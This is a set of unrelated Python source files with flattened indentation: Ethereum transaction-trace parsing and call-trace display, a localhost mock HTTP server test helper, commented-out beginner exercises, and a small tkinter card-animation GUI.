trace[i]["gasCost"] = trace[i + 1]["gasCost"]
trace[-1]["gasCost"] = 0
else:
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
# last_map gives a quick reference of previous values at each depth
last_map = {0: _get_last_map(self.receiver, self.input[:10])} # type: ignore
coverage_eval: Dict = {last_map[0]["name"]: {}}
precompile_contract = re.compile(r"0x0{38}(?:0[1-9]|1[0-8])")
call_opcodes = ("CALL", "STATICCALL", "DELEGATECALL")
for i in range(len(trace)):
# if depth has increased, tx has called into a different contract
is_depth_increase = trace[i]["depth"] > trace[i - 1]["depth"]
is_subcall = trace[i - 1]["op"] in call_opcodes
if is_depth_increase or is_subcall:
step = trace[i - 1]
if step["op"] in ("CREATE", "CREATE2"):
# creating a new contract
out = next(x for x in trace[i:] if x["depth"] == step["depth"])
address = out["stack"][-1][-40:]
sig = f"<{step['op']}>"
calldata = None
self._new_contracts.append(EthAddress(address))
if int(step["stack"][-1], 16):
self._add_internal_xfer(step["address"], address, step["stack"][-1])
else:
# calling an existing contract
stack_idx = -4 if step["op"] in ("CALL", "CALLCODE") else -3
offset = int(step["stack"][stack_idx], 16)
length = int(step["stack"][stack_idx - 1], 16)
calldata = HexBytes("".join(step["memory"]))[offset : offset + length]
sig = calldata[:4].hex()
address = step["stack"][-2][-40:]
if is_depth_increase:
last_map[trace[i]["depth"]] = _get_last_map(address, sig)
coverage_eval.setdefault(last_map[trace[i]["depth"]]["name"], {})
self._subcalls.append(
{"from": step["address"], "to": EthAddress(address), "op": step["op"]}
)
if step["op"] in ("CALL", "CALLCODE"):
self._subcalls[-1]["value"] = int(step["stack"][-3], 16)
if is_depth_increase and calldata and last_map[trace[i]["depth"]].get("function"):
fn = last_map[trace[i]["depth"]]["function"]
self._subcalls[-1]["function"] = fn._input_sig
try:
zip_ = zip(fn.abi["inputs"], fn.decode_input(calldata))
inputs = {i[0]["name"]: i[1] for i in zip_} # type: ignore
self._subcalls[-1]["inputs"] = inputs
except Exception:
self._subcalls[-1]["calldata"] = calldata.hex()
elif calldata or is_subcall:
self._subcalls[-1]["calldata"] = calldata.hex() # type: ignore
if precompile_contract.search(str(self._subcalls[-1]["from"])) is not None:
caller = self._subcalls.pop(-2)["from"]
self._subcalls[-1]["from"] = caller
# update trace from last_map
last = last_map[trace[i]["depth"]]
trace[i].update(
address=last["address"],
contractName=last["name"],
fn=last["internal_calls"][-1],
jumpDepth=last["jumpDepth"],
source=False,
)
opcode = trace[i]["op"]
if opcode == "CALL" and int(trace[i]["stack"][-3], 16):
self._add_internal_xfer(
last["address"], trace[i]["stack"][-2][-40:], trace[i]["stack"][-3]
)
try:
pc = last["pc_map"][trace[i]["pc"]]
except (KeyError, TypeError):
# we don't have enough information about this contract
continue
if trace[i]["depth"] and opcode in ("RETURN", "REVERT", "INVALID", "SELFDESTRUCT"):
subcall: dict = next(
i for i in self._subcalls[::-1] if i["to"] == last["address"] # type: ignore
)
if opcode == "RETURN":
returndata = _get_memory(trace[i], -1)
if returndata:
fn = last["function"]
try:
return_values = fn.decode_output(returndata)
if len(fn.abi["outputs"]) == 1:
return_values = (return_values,)
subcall["return_value"] = return_values
except Exception:
subcall["returndata"] = returndata.hex()
else:
subcall["return_value"] = None
elif opcode == "SELFDESTRUCT":
subcall["selfdestruct"] = True
else:
if opcode == "REVERT":
data = _get_memory(trace[i], -1)
if len(data) > 4:
try:
subcall["revert_msg"] = decode_abi(["string"], data[4:])[0]
except Exception:
subcall["revert_msg"] = data.hex()
if "revert_msg" not in subcall and "dev" in pc:
subcall["revert_msg"] = pc["dev"]
if "path" not in pc:
continue
trace[i]["source"] = {"filename": last["path_map"][pc["path"]], "offset": pc["offset"]}
if "fn" not in pc:
continue
# calculate coverage
if last["coverage"]:
if pc["path"] not in coverage_eval[last["name"]]:
coverage_eval[last["name"]][pc["path"]] = [set(), set(), set()]
if "statement" in pc:
coverage_eval[last["name"]][pc["path"]][0].add(pc["statement"])
if "branch" in pc:
if pc["op"] != "JUMPI":
last["active_branches"].add(pc["branch"])
elif "active_branches" not in last or pc["branch"] in last["active_branches"]:
# false, true
key = 1 if trace[i + 1]["pc"] == trace[i]["pc"] + 1 else 2
coverage_eval[last["name"]][pc["path"]][key].add(pc["branch"])
if "active_branches" in last:
last["active_branches"].remove(pc["branch"])
# ignore jumps with no function - they are compiler optimizations
if "jump" in pc:
# jump 'i' is calling into an internal function
if pc["jump"] == "i":
try:
fn = last["pc_map"][trace[i + 1]["pc"]]["fn"]
except (KeyError, IndexError):
continue
if fn != last["internal_calls"][-1]:
last["internal_calls"].append(fn)
last["jumpDepth"] += 1
# jump 'o' is returning from an internal function
elif last["jumpDepth"] > 0:
del last["internal_calls"][-1]
last["jumpDepth"] -= 1
coverage._add_transaction(
self.coverage_hash, dict((k, v) for k, v in coverage_eval.items() if v)
)
def _add_internal_xfer(self, from_: str, to: str, value: str) -> None:
self._internal_transfers.append( # type: ignore
{"from": EthAddress(from_), "to": EthAddress(to), "value": Wei(f"0x{value}")}
)
def _full_name(self) -> str:
if self.contract_name and self.fn_name:
return f"{self.contract_name}.{self.fn_name}"
return self.fn_name or "Transaction"
def info(self) -> None:
"""Displays verbose information about the transaction, including decoded event logs."""
result = f"Tx Hash: {self.txid}\nFrom: {self.sender}\n"
if self.contract_address and self.status:
result += f"New {self.contract_name} address: {self.contract_address}\n"
else:
result += f"To: {self.receiver}\n" f"Value: {self.value}\n"
if self.input != "0x" and int(self.input, 16):
result += f"Function: {self._full_name()}\n"
result += (
f"Block: {self.block_number}\nGas Used: "
f"{self.gas_used} / {self.gas_limit} "
f"({self.gas_used / self.gas_limit:.1%})\n"
)
if self.events:
events = list(self.events)
call_tree: List = ["--------------------------"]
while events:
idx = next(
(events.index(i) for i in events if i.address != events[0].address), len(events)
)
contract = state._find_contract(events[0].address)
if contract:
try:
name = contract.name()
except Exception:
name = contract._name
sub_tree: List = [f"{name} ({events[0].address})"]
else:
sub_tree = [f"{events[0].address}"]
for event in events[:idx]:
sub_tree.append([event.name, *(f"{k}: {v}" for k, v in event.items())])
call_tree.append(sub_tree)
events = events[idx:]
event_tree = build_tree([call_tree], multiline_pad=0, pad_depth=[0, 1])
result = f"{result}\nEvents In This Transaction\n{event_tree}"
result = color.highlight(result)
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color})"
print(f"Transaction was Mined {status}\n---------------------\n{result}")
def _get_trace_gas(self, start: int, stop: int) -> Tuple[int, int]:
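# Sketch of the contract, inferred from the code below: returns the tuple
# (internal_gas, total_gas) for trace steps in [start, stop), where internal_gas
# excludes gas spent inside deeper call frames and total_gas includes it.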
total_gas = 0
internal_gas = 0
is_internal = True
trace = self.trace
for i in range(start, stop):
# Check if we are in a subfunction or not
if is_internal and not _step_compare(trace[i], trace[start]):
is_internal = False
# For the internal gas tracking we ignore the gas passed to an external call
if trace[i]["depth"] > trace[start]["depth"]:
internal_gas -= trace[i - 1]["gasCost"]
elif not is_internal and _step_compare(trace[i], trace[start]):
is_internal = True
total_gas += trace[i]["gasCost"]
if is_internal:
internal_gas += trace[i]["gasCost"]
# manually add gas refunds where they occur
if trace[i]["op"] == "SSTORE" and int(trace[i]["stack"][-2], 16) == 0:
# 15000 gas is refunded if a word is set to 0x0
# Note: There is currently no way to check if the value was 0x0 before.
# This will give an incorrect refund if 0x0 is assigned to 0x0.
total_gas -= 15000
if is_internal:
internal_gas -= 15000
if trace[i]["op"] == "SELFDESTRUCT":
# 24000 gas is refunded on selfdestruct
total_gas -= 24000
if is_internal:
internal_gas -= 24000
# For external calls, add the remaining gas returned back
if start > 0 and trace[start]["depth"] > trace[start - 1]["depth"]:
total_gas += trace[start - 1]["gasCost"]
internal_gas += trace[start - 1]["gasCost"]
return internal_gas, total_gas
@trace_inspection
def call_trace(self, expand: bool = False) -> None:
"""
Display the complete sequence of contracts and methods called during
the transaction. The format:
Contract.functionName [instruction] start:stop [gas used]
* start:stop are index values for the `trace` member of this object,
showing the points where the call begins and ends
* for calls that include subcalls, gas use is displayed as
[gas used in this frame / gas used in this frame + subcalls]
* Calls displayed in red ended with a `REVERT` or `INVALID` instruction.
Arguments
---------
expand : bool
If `True`, show an expanded call trace including inputs and return values
"""
trace = self.trace
key = _step_internal(
trace[0], trace[-1], 0, len(trace), self._get_trace_gas(0, len(self.trace))
)
call_tree: List = [[key]]
active_tree: List = [call_tree[0]]
# (index, depth, jumpDepth) for relevant steps in the trace
trace_index = [(0, 0, 0)] + [
(i, trace[i]["depth"], trace[i]["jumpDepth"])
for i in range(1, len(trace))
if not _step_compare(trace[i], trace[i - 1])
]
subcalls = self.subcalls[::-1]
for i, (idx, depth, jump_depth) in enumerate(trace_index[1:], start=1):
last = trace_index[i - 1]
if depth == last[1] and jump_depth < last[2]:
# returning from an internal function, reduce tree by one
active_tree.pop()
continue
elif depth < last[1]:
# returning from an external call, reduce the tree by the jumpDepth of the previous depth
active_tree = active_tree[: -(last[2] + 1)]
continue
if depth > last[1]:
# called to a new contract
end = next((x[0] for x in trace_index[i + 1 :] if x[1] < depth), len(trace))
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_external(
trace[idx],
trace[end - 1],
idx,
end,
(total_gas, internal_gas),
subcalls.pop(),
expand,
)
elif depth == last[1] and jump_depth > last[2]:
# jumped into an internal function
end = next(
(
x[0]
for x in trace_index[i + 1 :]
if x[1] < depth or (x[1] == depth and x[2] < jump_depth)
),
len(trace),
)
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_internal(
trace[idx], trace[end - 1], idx, end, (total_gas, internal_gas)
)
active_tree[-1].append([key])
active_tree.append(active_tree[-1][-1])
print(
f"Call trace for '{color('bright blue')}{self.txid}{color}':\n"
f"Initial call cost [{color('bright yellow')}{self._call_cost} gas{color}]"
)
print(build_tree(call_tree).rstrip())
def traceback(self) -> None:
print(self._traceback_string() or "")
@trace_inspection
def _traceback_string(self) -> str:
"""Returns an error traceback for the transaction."""
if self.status == 1:
return ""
trace = self.trace
try:
idx = next(i for i in range(len(trace)) if trace[i]["op"] in ("REVERT", "INVALID"))
trace_range = range(idx, -1, -1)
except StopIteration:
return ""
try:
result = [next(i for i in trace_range if trace[i]["source"])]
except StopIteration:
return ""
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
while True:
try:
idx = next(
i
for i in trace_range
if trace[i]["depth"] < depth
or (trace[i]["depth"] == depth and trace[i]["jumpDepth"] < jump_depth)
)
result.append(idx)
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
except StopIteration:
break
return f"{color}Traceback for '{color('bright blue')}{self.txid}{color}':\n" + "\n".join(
self._source_string(i, 0) for i in result[::-1]
)
def error(self, pad: int = 3) -> None:
print(self._error_string(pad) or "")
@trace_inspection
def _error_string(self, pad: int = 3) -> str:
"""Returns the source code that caused the transaction to revert.
Args:
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
if self.status == 1:
return ""
# if RPC returned a program counter, try to find source without querying trace
if self._revert_pc:
highlight, linenos, path, fn_name = build._get_error_source_from_pc(self._revert_pc)
if highlight:
return _format_source(highlight, linenos, path, self._revert_pc, -1, fn_name)
self._revert_pc = None
# iterate backward through the trace until a step has a source offset
trace = self.trace
trace_range = range(len(trace) - 1, -1, -1)
try:
idx = next(i for i in trace_range if trace[i]["op"] in {"REVERT", "INVALID"})
idx = next(i for i in trace_range if trace[i]["source"])
return self._source_string(idx, pad)
except StopIteration:
return ""
def source(self, idx: int, pad: int = 3) -> None:
print(self._source_string(idx, pad) or "")
@trace_inspection
def _source_string(self, idx: int, pad: int) -> str:
"""Displays the associated source code for a given stack trace step.
Args:
idx: Stack trace step index
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
trace = self.trace[idx]
if not trace.get("source", None):
return ""
contract = state._find_contract(self.trace[idx]["address"])
source, linenos = highlight_source(
contract._sources.get(trace["source"]["filename"]), trace["source"]["offset"], pad
)
if not source:
return ""
return _format_source(
source,
linenos,
trace["source"]["filename"],
trace["pc"],
self.trace.index(trace),
trace["fn"],
)
def _format_source(source: str, linenos: Tuple, path: Path, pc: int, idx: int, fn_name: str) -> str:
ln = f" {color('bright blue')}{linenos[0]}"
if linenos[1] > linenos[0]:
ln = f"s{ln}{color('dark white')}-{color('bright blue')}{linenos[1]}"
return (
f"{color('dark white')}Trace step {color('bright blue')}{idx}{color('dark white')}, "
f"program counter {color('bright blue')}{pc}{color('dark white')}:\n {color('dark white')}"
f"File {color('bright magenta')}\"{path}\"{color('dark white')}, line{ln}"
f"{color('dark white')}, in {color('bright cyan')}{fn_name}{color('dark white')}:{source}"
)
def _step_compare(a: Dict, b: Dict) -> bool:
return a["depth"] == b["depth"] and a["jumpDepth"] == b["jumpDepth"]
def _step_internal(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict = None,
) -> str:
if last_step["op"] in {"REVERT", "INVALID"} and _step_compare(step, last_step):
contract_color = color("bright red")
else:
contract_color = color("bright cyan") if not step["jumpDepth"] else color()
key = f"{color('dark white')}{contract_color}{step['fn']} {color('dark white')}"
left_bracket = f"{color('dark white')}["
right_bracket = f"{color('dark white')}]"
if subcall:
key = f"{key}[{color}{subcall['op']}{right_bracket} "
key = f"{key}{start}:{stop}{color}"
if gas:
if gas[0] == gas[1]:
gas_str = f"{color('bright yellow')}{gas[0]} gas"
else:
gas_str = f"{color('bright yellow')}{gas[0]} / {gas[1]} gas"
key = f"{key} {left_bracket}{gas_str}{right_bracket}{color}"
if last_step["op"] == "SELFDESTRUCT":
key = f"{key} {left_bracket}{color('bright red')}SELFDESTRUCT{right_bracket}{color}"
return key
def _convert_0x_to_empty_bytes(value: Any) -> Any:
# black cannot parse `0x` without any trailing zeros, so we temporarily
# replace it with an empty bytestring
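# e.g. (hypothetical input) ("0x", 1, ("0x",)) becomes (b"", 1, (b"",)); _format()
# below swaps the b"" placeholders back to the literal string "0x" after black runs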
final = []
for item in value:
if isinstance(item, (list, tuple)):
final.append(_convert_0x_to_empty_bytes(item))
elif str(item) == "0x":
final.append(b"")
else:
final.append(item)
return type(value)(final)
def _format(value: Any) -> str:
if isinstance(value, (list, tuple)):
value = _convert_0x_to_empty_bytes(value)
mode = black.FileMode(line_length=60)
value = black.format_str(str(value), mode=mode).replace('b""', "0x")
return str(value)
def _step_external(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict,
expand: bool,
) -> str:
key = _step_internal(step, last_step, start, stop, gas, subcall)
if not expand:
return key
result: List = [key, f"address: {step['address']}"]
if "value" in subcall:
result.append(f"value: {subcall['value']}")
if "inputs" not in subcall:
result.append(f"calldata: {subcall.get('calldata')}")
elif subcall["inputs"]:
result.append(
["input arguments:", *(f"{k}: {_format(v)}" for k, v in subcall["inputs"].items())]
)
else:
result.append("input arguments: None")
if "return_value" in subcall:
value = subcall["return_value"]
if isinstance(value, tuple) and len(value) > 1:
result.append(["return values:", *(_format(i) for i in value)])
else:
if isinstance(value, tuple):
value = value[0]
result.append(f"return value: {_format(value)}")
elif "returndata" in subcall:
result.append(f"returndata: {subcall['returndata']}")
if "revert_msg" in subcall:
result.append(f"revert reason: {color('bright red')}{subcall['revert_msg']}{color}")
return build_tree([result], multiline_pad=0).rstrip()
def _get_memory(step: Dict, idx: int) -> HexBytes:
offset = int(step["stack"][idx], 16)
length = int(step["stack"][idx - 1], 16)
data = HexBytes("".join(step["memory"]))[offset : offset + length]
# append zero-bytes if allocated memory ends before `length` bytes
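# e.g. if `length` is 32 but only 16 bytes were present in memory (hypothetical
# values), 16 zero-bytes are appended so the returned data is always `length` bytes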
data = HexBytes(data + b"\x00" * (length - len(data)))
return data
def _get_last_map(address: EthAddress, sig: str) -> Dict:
contract = state._find_contract(address)
last_map = {"address": EthAddress(address), "jumpDepth": 0, "name": None, "coverage": False}
if contract:
if contract.get_method(sig):
full_fn_name = f"{contract._name}.{contract.get_method(sig)}"
else:
full_fn_name = contract._name
last_map.update(
contract=contract,
function=contract.get_method_object(sig),
name=contract._name,
internal_calls=[full_fn_name],
path_map=contract._build.get("allSourcePaths"),
pc_map=contract._build.get("pcMap"),
)
if isinstance(contract._project, project_main.Project):
# only evaluate coverage for contracts that are part of a `Project`
last_map["coverage"] = True
if contract._build.get("language") == "Solidity":
last_map["active_branches"] = set()
else:
last_map.update(contract=None, internal_calls=[f"<UnknownContract>.{sig}"], pc_map=None)
return last_map
def _is_call_to_precompile(subcall: dict) -> bool:
precompile_contract = re.compile(r"0x0{38}(?:0[1-9]|1[0-8])")
return True if precompile_contract.search(str(subcall["to"])) is not None else False
|
helpers.py
|
from multiprocessing import Process, Queue
from werkzeug.wrappers import Request
def make_server(port, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
options = {'handler_class': QuietHandler}
return make_server('127.0.0.1', port, handler, **options)
class http_server(object):
def __init__(self, port, handler):
self.queue = Queue()
self.server = make_server(port, handler)
def __enter__(self):
def run_app(server):
server.handle_request()
self.process = Process(target=run_app, args=(self.server,))
self.process.start()
return self.queue
def __exit__(self, exc_type, exc_val, exc_tb):
self.server.server_close()
self.server.socket.close()
self.process.terminate()
self.process.join()
class mock_server(object):
def __init__(self, port, status, headers, response):
def handler(environ, start_response):
request = Request(environ)
content_length = request.content_length
self.queue.put({'url': request.url, 'body': environ['wsgi.input'].read(content_length)})
start_response(status, headers)
return [response]
self.queue = Queue()
self.server = make_server(port, handler)
def __enter__(self):
def run_app(server):
server.handle_request()
# self.process = Process(target=run_app, args=(self.port, self.queue, self.status, self.headers, self.response))
self.process = Process(target=run_app, args=(self.server,))
self.process.start()
return self.queue
def __exit__(self, exc_type, exc_val, exc_tb):
self.server.server_close()
self.server.socket.close()
self.process.terminate()
self.process.join()
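# Hedged usage sketch (port, status and payload below are illustrative):
#   with mock_server(56000, '200 OK', [('Content-Type', 'text/plain')], b'pong') as queue:
#       ...  # issue an HTTP request against http://127.0.0.1:56000 here
#       captured = queue.get()  # {'url': ..., 'body': ...} recorded by the handler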
def host():
return 'tcp://127.0.0.1:56000'
|
2.py
|
'''
# filter() built-in function
def id_odd(n):
return n % 2==0
l=list(filter(id_odd,range(0,15)))
print(l)
# remove empty strings from a sequence
def not_empty(s):
return s and s.strip()
l=list(filter(not_empty,['a','','b',None,'c',' ']))
print(l)
# use filter to compute prime numbers
def su():
n=1
while True:
n+=2
yield n #n=3
def shaixuan(n):
return lambda x: x%n>0
def shengchengqi():
yield 2
startnum= su()
while True:
n=next(startnum)
yield n
startnum = filter(shaixuan(n),startnum)
for n in shengchengqi():
if n<1000:
print(n)
else:
break
# filter out palindromic numbers, e.g. 12321, 909
def is_palindrome(n):
str(n)==str(n)[::-1]
return str(n)==str(n)[::-1]
# test:
output = filter(is_palindrome, range(1, 1000))
print('1~1000:', list(output))
if list(filter(is_palindrome, range(1, 200))) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 22, 33, 44, 55, 66, 77, 88, 99, 101, 111, 121, 131, 141, 151, 161, 171, 181, 191]:
    print('Test passed!')
else:
    print('Test failed!')
'''
'''
# sorted() built-in function
l=sorted([1,4,-4,6,0])
print(l)
l=sorted([1,3,-4,5,-6],key=abs)
print(l)
l=sorted(['A','Z','a','zn','cxy','zhy'])
print(l)
l=sorted(['A','Z','a','zn','cxy','zhy'],key=str.lower)
print(l)
l=sorted(['A','Z','a','zn','cxy','zhy'],key=str.lower,reverse=True)
print(l)
from operator import itemgetter
L = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]
# sort by name
a=sorted(L,key=itemgetter(0))
print(a)
# sort by score (low to high)
b=sorted(L,key=itemgetter(1))
print(b)
# sort by score (high to low)
c=sorted(L,key=itemgetter(1),reverse=True)
print(c)
'''
'''
# closures: functions that return inner functions
def createCounter():
def counter(x):
def g():
return x+1
return g
f=[]
for i in range(1,6):
f.append(counter(i))
return f
def count():
fs = []
def f(n):
def j():
return n * n
return j
for i in range(1, 4):
fs.append(f(i))
return fs
f1, f2, f3 = count()
print(f1())
print(f2())
print(f3())
'''
'''
# lambda expressions
f=lambda x:x*x
print(f(2))
def is_odd(n):
return n%2==1
l=list(filter(is_odd,range(1,20)))
print(l)
L=list(filter(lambda n:n%2==1,range(1,20)))
print(L)
'''
'''
def now():
print('zn')
f=now
print(f())
print(now.__name__)
print(f.__name__)
def log(func):
def w(*args,**kw):
print('call %s():'%func.__name__)
return func(*args,**kw)
return w
@log
def now():
print('20181025')
now = log(now)
print(now())
'''
'''
# partial functions: by passing the base argument you can convert from any base N
l=int('12345',base=16)
print(l)
# binary to decimal
def int2(x,base=2):
return int(x,base)
print(int2('101'))
# binary to decimal, implemented another way
import functools
# functools.partial fixes some of a function's arguments (i.e. sets default values) and returns a new function
int2=functools.partial(int,base=2)
print(int2('111'))
print(int2('111',base=2))
args=(10,2,3,4)
print(max(*args))
'''
'test'
'''
def zn():
l=[]
for x in range(1,100,2):
l.append(x*(x+1))
print(l[len(l)-1])
print(zn())
'''
'''
try:
print('try---')
r=10/2
print('result:',r)
except ZeroDivisionError as e:
print('except:',e)
finally:
print('finally...')
print('END____')
try:
print('try...')
r=10/int('a')
print('result:',r)
except ValueError as e:
print('ValueError:',e)
except ZeroDivisionError as e:
print('ZeroDivisionError:',e)
finally:
print('finally...')
print('END')
'''
'''
from functools import reduce
def str2num(s):
return float(s)
def calc(exp):
ss = exp.split('+')
ns = map(str2num, ss)
return reduce(lambda acc, x: acc + x, ns)
def main():
r = calc('100 + 200 + 345')
print('100 + 200 + 345 =', r)
r = calc('99 + 88 + 7.6')
print('99 + 88 + 7.6 =', r)
main()
class Dict(dict):
def __init__(self, **kw):
super().__init__(**kw)
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(r"'Dict' object has no attribute '%s'" % key)
def __setattr__(self, key, value):
self[key] = value
d=dict(a=1,b=2)
print(d['a'])
print(d)
import unittest
from mydict import Dict
class TestDict(unittest.TestCase):
def test_init(self):
d = Dict(a=1, b='test')
self.assertEqual(d.a, 1)
self.assertEqual(d.b, 'test')
self.assertTrue(isinstance(d, dict))
def test_key(self):
d = Dict()
d['key'] = 'value'
self.assertEqual(d.key, 'value')
def test_attr(self):
d = Dict()
d.key = 'value'
self.assertTrue('key' in d)
self.assertEqual(d['key'], 'value')
def test_keyerror(self):
d = Dict()
with self.assertRaises(KeyError):
value = d['empty']
def test_attrerror(self):
d = Dict()
with self.assertRaises(AttributeError):
value = d.empty
if __name__ == '__main__':
unittest.main()
'''
'''
import unittest
class Student(object):
def __init__(self, name, score):
self.name = name
self.score = score
def get_grade(self):
if self.score>100 or self.score<0:
raise ValueError("the score is wrong!")
if 80>self.score >= 60:
return 'B'
if self.score >= 80:
return 'A'
return 'C'
class TestStudent(unittest.TestCase):
def test_80_to_100(self):
s1 = Student('Bart', 80)
s2 = Student('Lisa', 100)
print(s1.get_grade())
self.assertEqual(s1.get_grade(), 'A')
self.assertEqual(s2.get_grade(), 'A')
def test_60_to_80(self):
s1 = Student('Bart', 60)
s2 = Student('Lisa', 79)
self.assertEqual(s1.get_grade(), 'B')
self.assertEqual(s2.get_grade(), 'B')
def test_0_to_60(self):
s1 = Student('Bart', 0)
s2 = Student('Lisa', 59)
self.assertEqual(s1.get_grade(), 'C')
self.assertEqual(s2.get_grade(), 'C')
def test_invalid(self):
s1 = Student('Bart', -1)
s2 = Student('Lisa', 101)
with self.assertRaises(ValueError):
s1.get_grade()
with self.assertRaises(ValueError):
s2.get_grade()
if __name__ == '__main__':
unittest.main()
'''
'''
# read file contents and close the file, approach 1
try:
f=open("C:/Users/zn/Desktop/hexo.txt",'r')
print(f.read())
finally:
if f:
f.close()
# read file contents and close the file, approach 2
with open("C:/Users/zn/Desktop/hexo.txt",'r') as f:
print(f.read())
# use 'rb' to read images and videos
with open("C:/Users/zn/Desktop/1.png",'rb') as f:
print(f.read())
# use encoding='gbk' to read text files that are not UTF-8 encoded
'''
'''
# write a file with 'w' (overwrites existing content); 'a' appends without overwriting
with open("/Users/zn/Desktop/test.txt",'w') as f:
f.write('hello zn')
'''
'''
#StringIO
# write str to an in-memory buffer
from io import StringIO
f=StringIO()
f.write('hello')
f.write(' ')
f.write('world')
print(f.getvalue())
# read str from memory
from io import StringIO
f=StringIO('hello\nnihaoa\nbye')
while True:
s=f.readline()
if s=="":
break
print(s.strip())
#BytesIO (operates on bytes, not str)
# write
from io import BytesIO
f=BytesIO()
a=f.write('中国'.encode('utf-8'))
print(a)
print(f.getvalue())
# read
from io import BytesIO
f=BytesIO(b'\xe4\xb8\xad\xe6\x96\x87')
print(f.read())
'''
'''
import os
#print(os.name)
#print(os.environ)
#print(os.environ.get('PATH'))
#print(os.environ.get('x','default'))
#print(os.path.abspath('.'))
#print(os.path.join('/Users/zn/Desktop','testdir'))
#print(os.mkdir('/Users/zn/Desktop/testdir'))
#print(os.rmdir('/Users/zn/Desktop/testdir'))
#print(os.rename('test.txt','test.py'))
# list all the .py files
a=[x for x in os.listdir('.') if os.path.isfile(x) and os.path.splitext(x)[1]=='.py']
print(a)
'''
'''
# JSON serialization and deserialization
import json
d=dict(name='Bob',age=20,score=88)
print(json.dumps(d))
# output: {"name": "Bob", "age": 20, "score": 88}
json_str='{"age":20,"score":88,"name":"bob"}'
print(json.loads(json_str))
'''
'''
import json
class Student(object):
def __init__(self,name,age,score):
self.name=name
self.age=age
self.score=score
s=Student('Bob',20,88)
def student2dic(std):
return{
'name':std.name,
'age':std.age,
'score':std.score
}
print(json.dumps(s,default=student2dic))
'''
'''
from multiprocessing import Process
import os
# code to be executed by the child process
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
'''
|
Interfaz.py
|
try:
import tkinter as tk
except:
import Tkinter as tk
import threading
import random
class Tarjeta(object):
"""docstring for Tarjeta"""
def __init__(self, master = None, coords = None, color = "black", image = None):
super(Tarjeta, self).__init__()
self.master = master
self.coords = coords
if (len(self.coords) != 2) and (len(self.coords) != 4):
raise ValueError("2 points to form a rectangle")
if len(self.coords) == 2:
puntos = []
for i in self.coords:
if type(i) != tuple:
raise ValueError("4 points to form a rectangle")
else:
puntos += list(i)
self.coords = puntos
self.color = color
self.shape = self.master.create_polygon(self.coords[0], self.coords[1], self.coords[2],
self.coords[1], self.coords[2], self.coords[3], self.coords[0], self.coords[3], fill = self.color)
print("<class Tarjeta>")
self.master.bind("<Button-1>", self.press)
def press(self, event = None):
r = lambda: random.randint(0,100)
self.master.itemconfig(self.shape, fill = '#%02X%02X%02X' % (r(),r(),r()))
x = (self.coords[0]+self.coords[2])/2
y = (self.coords[1]+self.coords[3])/2
coords = self.master.coords(self.shape)
verticalArriba = -2
verticalAbajo = -2
horizontalDrcha = -2
horizontalIzq = -2
if event.x < x:
horizontalIzq = 2
else:
horizontalDrcha = 2
if event.y < y:
verticalArriba = 2
else:
verticalAbajo = 2
for i in range(10):
coords = self.master.coords(self.shape)
self.master.coords(self.shape, coords[0] + verticalArriba, coords[1] + horizontalIzq,
coords[2] - verticalArriba, coords[3] + horizontalDrcha, coords[4] - verticalAbajo,
coords[5] + horizontalIzq, coords[6] + verticalAbajo, coords[7] + horizontalDrcha)
self.master.update()
self.master.after(10)
self.master.after(10)
for i in range(10):
coords = self.master.coords(self.shape)
self.master.coords(self.shape, coords[0] - verticalArriba, coords[1] - horizontalIzq,
coords[2] + verticalArriba, coords[3] - horizontalDrcha, coords[4] + verticalAbajo,
coords[5] - horizontalIzq, coords[6] - verticalAbajo, coords[7] - horizontalDrcha)
self.master.update()
self.master.after(10)
def DetectButton(ID, event = None):
ID.config(bg = "#212f3d") #"#17202a")
def LeaveButton(ID, event = None):
ID.config(bg = "#1c2833")
def moveHeader(event = None, operator = '<', number = -8):
if operator == "<":
frameHeader.unbind("<Motion>")
frameHeader.bind('<Leave>', lambda event, arg1 = '>', arg2 = -50: moveHeader(event, arg1, arg2))
else:
frameHeader.unbind('<Leave>')
frameHeader.bind("<Motion>", moveHeader)
x = int(frameHeader.place_info()['x'])
y = int(frameHeader.place_info()['y'])
condition = eval(str(y) + operator + str(number))
while condition:
condition = eval(str(y) + operator + str(number))
try:
if operator == "<":
frameHeader.place(x = x, y = y+1)
else:
frameHeader.place(x = x, y = y-1)
except: pass
window.update()
window.after(2)
x = int(frameHeader.place_info()["x"])
y = int(frameHeader.place_info()["y"])
def movHeader(event = None, operator = '<', number = -8):
hilo = threading.Thread(target = moveHeader, args = (None, operator, number), daemon = True)
hilo.start()
# ==========================================================================================
# MAIN
# ==========================================================================================
window = tk.Tk()
print(window.winfo_screenwidth())
window.title("Homogeneous Project")
f = tk.Canvas(window, width = 1250, height = 700, bg = "#308180")
f.pack()
print(tk.Canvas.create_polygon)
#shape = f.create_polygon((300,300),(600,300),(300,600),(600,600),fill = "black") #UPLEFT UPRIGH DWLEFT DWRIGHT
f.create_oval(300-5,300-5,300+5,300+5, fill = 'red')
f.create_oval(600-5,300-5,600+5,300+5,fill = 'green')
f.create_oval(300-5,600-5,300+5,600+5,fill = 'yellow')
f.create_oval(600-5,600-5,600+5,600+5,fill = 'blue')
'''
foto = tk.PhotoImage(file="./Images/a.png")
label = tk.Label(f, image=foto)
label.place(x = 0, y = 0)
label.photo = foto
'''
Tarjeta(f, coords = (300,300,600,600))
frameHeader = tk.Frame(f, width = 1250, height = 62, bg = "gray12")
frameHeader.place(x = 0, y = -50)
frameHome = tk.Frame(f, width = 200, height = 700, bg = "#17202a")
